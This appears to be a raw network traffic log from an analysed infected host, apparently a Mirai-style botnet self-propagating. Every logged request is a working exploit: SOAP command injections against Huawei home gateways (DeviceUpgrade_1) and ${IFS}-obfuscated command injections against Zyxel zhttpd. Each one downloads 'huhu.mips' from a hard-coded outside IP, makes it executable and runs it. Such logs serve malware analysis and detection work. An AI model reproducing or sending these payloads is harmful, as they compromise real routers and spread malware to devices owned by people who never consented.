                                                      Feb 2, 2024 06:35:49.513510942 CET829OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                      Feb 2, 2024 06:35:50.265994072 CET829OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                      Feb 2, 2024 06:35:51.161952019 CET829OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                      Feb 2, 2024 06:35:52.917968988 CET829OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                      Feb 2, 2024 06:35:56.633708954 CET829OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                      Feb 2, 2024 06:36:03.797434092 CET829OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept: */*
                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                      Content-Length: 472
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3402192.168.2.146059240.152.90.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554225922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3403192.168.2.144592460.248.68.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554260969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3404192.168.2.144500294.13.99.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554306984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3405192.168.2.1444928121.81.84.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554349899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3406192.168.2.1459140103.147.223.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554389000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3407192.168.2.1455128126.213.222.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554409027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3408192.168.2.14492962.76.245.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554467916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3409192.168.2.143900054.126.64.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554505110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3410192.168.2.1449684165.100.129.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554549932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3411192.168.2.143632268.246.197.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554596901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3412192.168.2.1442480202.177.118.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554616928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3413192.168.2.1434102148.202.27.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554668903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3414192.168.2.145169249.143.2.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554707050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3415192.168.2.1449584163.210.17.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554754019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3416192.168.2.145883020.160.104.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554804087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3417192.168.2.1459600113.44.198.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554851055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3418192.168.2.1438036103.143.45.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554898977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3419192.168.2.1444006216.26.253.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554927111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3420192.168.2.144799814.101.212.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.554960012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3421192.168.2.144031675.137.157.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555012941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3422192.168.2.1458784185.253.142.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:49.555047035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


